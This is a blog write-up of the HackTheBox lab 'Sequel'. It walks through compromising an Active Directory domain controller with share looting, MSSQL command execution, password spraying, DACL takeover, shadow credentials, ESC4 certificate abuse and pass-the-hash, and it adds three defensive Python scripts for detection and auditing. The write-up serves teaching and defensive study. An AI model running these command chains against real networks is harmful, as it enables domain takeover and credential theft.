cwoellner.com ~ personal website & blog

Writeup of Sequel From HackTheBox

Published on: Friday, Dec 12, 2025

Getting a foothold

For the initial port scan, I use the following nmap command:

nmap -sS -A -Pn -T5 -p- -oN nmap.txt 10.129.229.189

And receive the following results:

# Nmap 7.95 scan initiated Sat Jan 11 20:17:32 2025 as: nmap -T5 -p- -A -sS -Pn -oN nmap.txt 10.10.11.51
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 10.10.11.51
Host is up (0.10s latency).
Not shown: 65510 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-11 19:23:14Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-01-11T19:24:48+00:00; -59m57s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-01-11T19:24:48+00:00; -59m57s from scanner time.
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-11T19:03:10
|_Not valid after:  2055-01-11T19:03:10
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2025-01-11T19:24:48+00:00; -59m57s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-01-11T19:24:48+00:00; -59m57s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49682/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49684/tcp open  msrpc         Microsoft Windows RPC
49685/tcp open  msrpc         Microsoft Windows RPC
49693/tcp open  msrpc         Microsoft Windows RPC
49712/tcp open  msrpc         Microsoft Windows RPC
49732/tcp open  msrpc         Microsoft Windows RPC
49787/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-01-11T19:24:11
|_  start_date: N/A
|_clock-skew: mean: -59m57s, deviation: 0s, median: -59m57s

TRACEROUTE (using port 445/tcp)
HOP RTT      ADDRESS
1   98.43 ms 10.10.14.1
2   98.52 ms 10.10.11.51

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 11 20:24:46 2025 -- 1 IP address (1 host up) scanned in 434.50 seconds

This box also provides us with credentials for an AD user, rose:KxEPkKe6R8su. I use these credentials to start gathering information about the domain using BloodHound and Certipy.

bloodhound-ce-python -ns 10.10.11.51 -u rose -p KxEPkKe6R8su -d sequel.htb -c All
certipy find -u rose@sequel.htb -p KxEPkKe6R8su -dc-ip 10.10.11.51 -vuln -old-bloodhound

Next, I use NetExec to query the shares our user has access to.

[chris@attacker ~]$ nxc smb 10.10.11.51 -u rose -p KxEPkKe6R8su --shares
SMB         10.10.11.51     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.51     445    DC01             [+] sequel.htb\rose:KxEPkKe6R8su 
SMB         10.10.11.51     445    DC01             [*] Enumerated shares
SMB         10.10.11.51     445    DC01             Share           Permissions     Remark
SMB         10.10.11.51     445    DC01             -----           -----------     ------
SMB         10.10.11.51     445    DC01             Accounting Department READ            
SMB         10.10.11.51     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.51     445    DC01             C$                              Default share
SMB         10.10.11.51     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.51     445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.11.51     445    DC01             SYSVOL          READ            Logon server share 
SMB         10.10.11.51     445    DC01             Users           READ  

The Accounting Department share looks interesting, so I use smbclient to browse it.

smbclient -U 'sequel.htb\rose' '//10.10.11.51/Accounting Department'

Within the share I find two xlsx files. I download them and try to open them in LibreOffice, but they seem to be corrupted or incompatible. Since an xlsx file is just a zip archive, I use unzip to extract it and find usernames and passwords in the xl/sharedStrings.xml file of accounts.xlsx.

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="25" uniqueCount="24"><si><t xml:space="preserve">First Name</t></si><si><t xml:space="preserve">Last Name</t></si><si><t xml:space="preserve">Email</t></si><si><t xml:space="preserve">Username</t></si><si><t xml:space="preserve">Password</t></si>
<si><t xml:space="preserve">Angela</t></si><si><t xml:space="preserve">Martin</t></si><si><t xml:space="preserve">angela@sequel.htb</t></si><si><t xml:space="preserve">angela</t></si><si><t xml:space="preserve">0fwz7Q4mSpurIt99</t></si>
<si><t xml:space="preserve">Oscar</t></si><si><t xml:space="preserve">Martinez</t></si><si><t xml:space="preserve">oscar@sequel.htb</t></si><si><t xml:space="preserve">oscar</t></si><si><t xml:space="preserve">86LxLBMgEWaKUnBG</t></si>
<si><t xml:space="preserve">Kevin</t></si><si><t xml:space="preserve">Malone</t></si><si><t xml:space="preserve">kevin@sequel.htb</t></si><si><t xml:space="preserve">kevin</t></si><si><t xml:space="preserve">Md9Wlq1E5bZnVDVo</t></si>
<si><t xml:space="preserve">NULL</t></si><si><t xml:space="preserve">sa@sequel.htb</t></si><si><t xml:space="preserve">sa</t></si><si><t xml:space="preserve">MSSQLP@ssw0rd!</t></si></sst>
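
As an added example (not part of the original writeup), the following Python script does what the unzip step above does by hand: it reads xl/sharedStrings.xml straight out of the xlsx zip container, lists every string cell, and flags column headers that suggest the sheet holds plaintext credentials. This is the kind of check a file-share audit can run over every spreadsheet it finds, including workbooks too damaged for Office to open. The sample workbook it builds in memory and the SENSITIVE_HEADERS list are constructed for the example; the values are placeholders, not the ones found on the share.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# SpreadsheetML namespace used by xl/sharedStrings.xml.
SML_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"

# Column headers whose presence suggests a sheet stores plaintext secrets.
# Constructed list for this example; extend it to match local naming.
SENSITIVE_HEADERS = {"password", "passwd", "pwd", "secret", "api key", "apikey", "token"}


def shared_strings(xlsx_bytes):
    """Return the shared-string table of an .xlsx as a list of strings.

    The XML part is read straight out of the zip container, so this still
    works when the workbook is damaged enough that Office or LibreOffice
    refuse to open it. Rich-text cells (<si> holding several <r><t> runs)
    are joined into one string.
    """
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        if "xl/sharedStrings.xml" not in zf.namelist():
            return []  # no text cells, or not a spreadsheet at all
        root = ET.fromstring(zf.read("xl/sharedStrings.xml"))
    strings = []
    for si in root.findall("{%s}si" % SML_NS):
        strings.append("".join(t.text or "" for t in si.iter("{%s}t" % SML_NS)))
    return strings


def flag_sensitive(strings):
    """Return the strings that look like a credential column header."""
    return [s for s in strings if s.strip().lower() in SENSITIVE_HEADERS]


def build_sample_xlsx(include_sst=True):
    """Constructed minimal .xlsx container used as offline input.

    Holds only the shared-string table (placeholder values, not the ones
    found on the share). A real workbook also carries [Content_Types].xml,
    xl/workbook.xml and the worksheet parts, which this parser never needs.
    """
    sst = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<sst xmlns="{SML_NS}" count="6" uniqueCount="6">'
        '<si><t>First Name</t></si><si><t>Username</t></si><si><t>Password</t></si>'
        '<si><t>Example</t></si><si><t>example.user</t></si>'
        '<si><r><t>Placeholder</t></r><r><t>Pass123</t></r></si>'
        '</sst>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        if include_sst:
            zf.writestr("xl/sharedStrings.xml", sst)
        else:
            zf.writestr("xl/workbook.xml", "<workbook/>")
    return buf.getvalue()


if __name__ == "__main__":
    found = shared_strings(build_sample_xlsx())
    for s in found:
        print(repr(s))
    print("credential headers:", flag_sensitive(found))
```

For a real audit, replace build_sample_xlsx() with the bytes of each .xlsx found on a share; a hit on flag_sensitive is a reason to pull the file for review and to rotate whatever it lists.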

The credentials sa:MSSQLP@ssw0rd! look promising, so I try to connect to the MSSQL server using NetExec. The initial attempt fails, but with the --local-auth flag I am able to connect.

[chris@attacker ~]$ nxc mssql 10.10.11.51 -u sa -p MSSQLP@ssw0rd! --local-auth
MSSQL       10.10.11.51     1433   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb)
MSSQL       10.10.11.51     1433   DC01             [+] DC01\sa:MSSQLP@ssw0rd! (Pwn3d!)

The Pwn3d! message indicates that I am able to execute shell commands on the server via mssqlexec. I can use this to get a reverse shell on the server, or just use the -x flag to send commands directly.

User flag

I use this to browse the filesystem and find a file called sql-Configuration.INI inside the C:\SQL2019\ExpressAdv_ENU folder. Inside the file I find the password WqSZAF6CysDQbGb3 for the sql_svc account. Since I am unable to find any other interesting files, I use BloodHound to generate a list of domain users and check them for password reuse.

nxc smb 10.10.11.51 -u ./users.txt -p WqSZAF6CysDQbGb3 --continue-on-success

The password WqSZAF6CysDQbGb3 is being reused by the user ryan. Checking ryan in BloodHound shows that he is a member of the Remote Management Users group, which allows me to connect via evil-winrm and thus get the user flag.

evil-winrm -i 10.10.11.51 -u 'sequel\ryan' -p WqSZAF6CysDQbGb3

Administrator flag

Another user that looked interesting to me was ca_svc. Using BloodHound's pathfinding feature, I can see that ryan can use his WriteOwner rights over ca_svc to take over the account.

[Screenshot: BloodHound path from ryan to ca_svc]

I use the following impacket commands to do so:

owneredit.py -action write -target ca_svc -new-owner ryan -dc-ip 10.10.11.51 'sequel.htb/ryan:WqSZAF6CysDQbGb3'

dacledit.py -action write -rights FullControl -principal ryan -target ca_svc -dc-ip 10.10.11.51 'sequel.htb/ryan:WqSZAF6CysDQbGb3'

If you get any errors related to md4 no longer being supported you can re-enable it by following this solution: https://github.com/openssl/openssl/issues/21247

Option 1: Setting a new password for ca_svc

net rpc password ca_svc "newP@ssw0rd2022" -U 'sequel.htb/ryan%WqSZAF6CysDQbGb3' -S "DC01.sequel.htb"

I can now use the new password to connect to the server as ca_svc.

Option 2: Using shadow credentials to get the NT hash of ca_svc

Setting a new password for an existing account is not recommended in real-life scenarios and shared environments. Another option is to use the shadow credentials feature of Certipy to get the NT hash of the ca_svc account.

[chris@attacker ~]$ certipy shadow -account ca_svc -ns 10.10.11.51 -u ryan@sequel.htb -p WqSZAF6CysDQbGb3 auto -device-id 1
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '3998c1dd-d372-c372-c334-433237982de5'
[*] Adding Key Credential with device ID '3998c1dd-d372-c372-c334-433237982de5' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID '3998c1dd-d372-c372-c334-433237982de5' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Using principal: ca_svc@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': c318d62c8b3ca508dd753dda8cc74028
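
As an added example that is not part of the original writeup, here is the defender's side of the last two steps. Both the owner/DACL rewrite done with owneredit.py and dacledit.py above and the Key Credential that Certipy adds and then removes leave Directory Service Changes events (ID 5136) on the domain controller. The Python below parses a handful of such events and raises an alert when msDS-KeyCredentialLink on an account is written by anyone other than that account itself, or when the nTSecurityDescriptor of a user or computer is rewritten by a non-admin. The event lines are constructed and flattened to key=value pairs (real events are XML with the same EventData field names), and ALLOWLIST is an assumption; the detection only works if the Directory Service Changes audit subcategory is enabled and the objects carry a SACL, otherwise 5136 is never logged.

```python
import re

# Meaning of the OperationType codes in event 5136, as documented by Microsoft.
OPERATIONS = {"%%14674": "Value Added", "%%14675": "Value Deleted"}

# Accounts expected to rewrite security descriptors or key credentials.
# Constructed allowlist for this example; a real one would be built from
# the tier-0 groups and the provisioning services in use.
ALLOWLIST = {"Administrator"}

# Constructed sample: five 5136 events flattened to key=value pairs. The
# third and fourth lines mirror what a shadow-credential tool leaves behind
# (it adds a key credential, authenticates, then deletes it again).
SAMPLE_EVENTS = """
EventID=5136 SubjectUserName=DC01$ ObjectDN=CN=DC01,OU=Domain Controllers,DC=sequel,DC=htb ObjectClass=computer AttributeLDAPDisplayName=msDS-KeyCredentialLink OperationType=%%14674
EventID=5136 SubjectUserName=ryan ObjectDN=CN=ca_svc,CN=Users,DC=sequel,DC=htb ObjectClass=user AttributeLDAPDisplayName=nTSecurityDescriptor OperationType=%%14674
EventID=5136 SubjectUserName=ryan ObjectDN=CN=ca_svc,CN=Users,DC=sequel,DC=htb ObjectClass=user AttributeLDAPDisplayName=msDS-KeyCredentialLink OperationType=%%14674
EventID=5136 SubjectUserName=ryan ObjectDN=CN=ca_svc,CN=Users,DC=sequel,DC=htb ObjectClass=user AttributeLDAPDisplayName=msDS-KeyCredentialLink OperationType=%%14675
EventID=5136 SubjectUserName=Administrator ObjectDN=CN=angela,CN=Users,DC=sequel,DC=htb ObjectClass=user AttributeLDAPDisplayName=description OperationType=%%14674
"""

# key=value pairs where a value may contain spaces (DNs with "OU=Domain Controllers").
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")


def parse_event(line):
    """Split one flattened event line into a dict."""
    return dict(FIELD_RE.findall(line.strip()))


def account_from_dn(dn):
    """'CN=ca_svc,CN=Users,DC=...' -> 'ca_svc' (value of the first RDN)."""
    m = re.match(r"CN=([^,]+)", dn)
    return m.group(1) if m else dn


def detect(events_text, allowlist=ALLOWLIST):
    """Return (rule, subject, target, operation) for suspicious 5136 events.

    shadow-credential: msDS-KeyCredentialLink of an account changed by
        someone other than that account (or its computer account) or an
        allowlisted admin. Legitimate Windows Hello / device registration
        is written by the account for itself.
    acl-change: nTSecurityDescriptor (owner or DACL) of a user or computer
        rewritten by a non-allowlisted subject, the footprint of an
        owneredit/dacledit style takeover.
    """
    alerts = []
    for line in events_text.strip().splitlines():
        ev = parse_event(line)
        if ev.get("EventID") != "5136":
            continue
        subject = ev["SubjectUserName"]
        target = account_from_dn(ev["ObjectDN"])
        attr = ev["AttributeLDAPDisplayName"]
        op = OPERATIONS.get(ev["OperationType"], ev["OperationType"])
        if subject in allowlist:
            continue
        self_write = subject.rstrip("$").lower() == target.rstrip("$").lower()
        if attr == "msDS-KeyCredentialLink" and not self_write:
            alerts.append(("shadow-credential", subject, target, op))
        elif attr == "nTSecurityDescriptor" and ev.get("ObjectClass") in ("user", "computer"):
            alerts.append(("acl-change", subject, target, op))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Note that the restore step Certipy performs shows up as a second alert (Value Deleted) a few seconds after the first; an add/delete pair on msDS-KeyCredentialLink from the same non-admin subject within a short window is a stronger signal than either event alone.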

Using the credentials

The following commands can be executed with either the -p flag or the -hashes flag to use the password or the NT hash respectively.

I use the credentials to check for vulnerable certs using certipy:

[chris@attacker ~]$ certipy find -u ca_svc -hashes c318d62c8b3ca508dd753dda8cc74028 -dc-ip 10.10.11.51 -vuln -stdout
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP
[*] Got CA configuration for 'sequel-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : sequel-DC01-CA
    DNS Name                            : DC01.sequel.htb
    Certificate Subject                 : CN=sequel-DC01-CA, DC=sequel, DC=htb
    Certificate Serial Number           : 152DBD2D8E9C079742C0F3BFF2A211D3
    Certificate Validity Start          : 2024-06-08 16:50:40+00:00
    Certificate Validity End            : 2124-06-08 17:00:40+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : SEQUEL.HTB\Administrators
      Access Rights
        ManageCertificates              : SEQUEL.HTB\Administrators
                                          SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        ManageCa                        : SEQUEL.HTB\Administrators
                                          SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        Enroll                          : SEQUEL.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : DunderMifflinAuthentication
    Display Name                        : Dunder Mifflin Authentication
    Certificate Authorities             : sequel-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectRequireCommonName
                                          SubjectAltRequireDns
    Enrollment Flag                     : AutoEnrollment
                                          PublishToDs
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1000 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : SEQUEL.HTB\Enterprise Admins
        Full Control Principals         : SEQUEL.HTB\Cert Publishers
        Write Owner Principals          : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
                                          SEQUEL.HTB\Cert Publishers
        Write Dacl Principals           : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
                                          SEQUEL.HTB\Cert Publishers
        Write Property Principals       : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
                                          SEQUEL.HTB\Cert Publishers
    [!] Vulnerabilities
      ESC4                              : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissions
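
As an added example (my own code, not Certipy's and not from the original writeup), the script below turns the certipy find -stdout layout above into a reusable audit: it parses the Certificate Templates section, collects the Object Control Permissions of every enabled template, and reports any principal outside a tier-0 allowlist that holds Owner, Full Control, Write Owner, Write Dacl or Write Property, which is exactly the condition behind the ESC4 finding. SAMPLE is a constructed excerpt in that layout (the second template, ExampleUserTemplate, is invented as a clean comparison case), and TIER0 is an assumed allowlist.

```python
import re

# Rights in a template's "Object Control Permissions" block that let the
# holder rewrite the template (the ESC4 condition).
CONTROL_KEYS = {"Owner", "Full Control Principals", "Write Owner Principals",
                "Write Dacl Principals", "Write Property Principals"}

# Principals that may legitimately hold those rights. Constructed allowlist
# for this example; adjust to the forest's actual tier-0 groups.
TIER0 = {"Administrators", "Domain Admins", "Enterprise Admins", "Administrator"}

# Constructed excerpt in the layout of `certipy find -stdout`, trimmed to
# the fields this parser reads. The second template is invented.
SAMPLE = r"""
Certificate Authorities
  0
    CA Name                             : sequel-DC01-CA
    Permissions
      Owner                             : SEQUEL.HTB\Administrators
Certificate Templates
  0
    Template Name                       : DunderMifflinAuthentication
    Enabled                             : True
    Certificate Name Flag               : SubjectRequireCommonName
                                          SubjectAltRequireDns
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : SEQUEL.HTB\Enterprise Admins
        Full Control Principals         : SEQUEL.HTB\Cert Publishers
        Write Owner Principals          : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Cert Publishers
        Write Dacl Principals           : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Cert Publishers
    [!] Vulnerabilities
      ESC4                              : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissions
  1
    Template Name                       : ExampleUserTemplate
    Enabled                             : True
    Permissions
      Object Control Permissions
        Owner                           : SEQUEL.HTB\Enterprise Admins
        Write Dacl Principals           : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
"""

SECTION_HEADERS = {"Permissions", "Enrollment Permissions", "Object Control Permissions"}


def parse_templates(text):
    """Parse the 'Certificate Templates' section into a list of dicts.

    Each dict has name, enabled and control, where control maps a right
    from CONTROL_KEYS to its list of principals. Multi-valued fields
    continue on following lines that carry no ':', so such lines are
    appended to the last key seen.
    """
    templates, current, key, in_templates, in_control = [], None, None, False, False
    for raw in text.splitlines():
        stripped = raw.strip()
        if not stripped:
            continue
        if not raw[0].isspace():                   # top-level section line
            in_templates = raw.startswith("Certificate Templates")
            current = None
            continue
        if not in_templates:
            continue
        if re.fullmatch(r"\d+", stripped):         # "  0", "  1": new template
            current = {"name": None, "enabled": None, "control": {}}
            templates.append(current)
            key, in_control = None, False
            continue
        if current is None:
            continue
        if stripped in SECTION_HEADERS or stripped.startswith("[!]"):
            in_control = stripped == "Object Control Permissions"
            key = None
        elif ":" in stripped:
            key, value = (part.strip() for part in stripped.split(":", 1))
            if key == "Template Name":
                current["name"] = value
            elif key == "Enabled":
                current["enabled"] = value == "True"
            elif in_control and key in CONTROL_KEYS:
                current["control"][key] = [value]
        elif in_control and key in current["control"]:
            current["control"][key].append(stripped)
    return templates


def find_weak_control(templates, tier0=TIER0):
    """Return (template, right, principal) for every enabled template whose
    object-control rights are held by a principal outside tier0."""
    findings = []
    for t in templates:
        if not t["enabled"]:
            continue
        for right, principals in t["control"].items():
            for p in principals:
                if p.split("\\", 1)[-1] not in tier0:
                    findings.append((t["name"], right, p))
    return findings


if __name__ == "__main__":
    for finding in find_weak_control(parse_templates(SAMPLE)):
        print("%s: %s held by %s" % finding)
```

To run it against real output, save the text of certipy find -stdout to a file and pass its contents to parse_templates. A finding means the template's ACL should be tightened, since the listed principal can change the template's settings; checking this after every template change catches the condition before a tool has to point it out.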

The result shows that the certificate template DunderMifflinAuthentication is vulnerable to ESC4 and that the Cert Publishers group is able to modify the template. I use certipy to exploit this.

certipy template -u ca_svc -hashes c318d62c8b3ca508dd753dda8cc74028 -dc-ip 10.10.11.51 -template DunderMifflinAuthentication -target dc01.sequel.htb -save-old
certipy req -ca sequel-DC01-CA -template DunderMifflinAuthentication -dc-ip 10.10.11.51 -u ca_svc -hashes c318d62c8b3ca508dd753dda8cc74028 -target dc01.sequel.htb -upn administrator@sequel.htb
certipy auth -pfx administrator.pfx -dc-ip 10.10.11.51

This gives us the NTLM hash of the administrator account, which we can use to connect via evil-winrm and to get the root flag.

evil-winrm -i 10.10.11.51 -u 'sequel\administrator' -H 7a8d4e04986afa8ed4060f75e5a0b3ff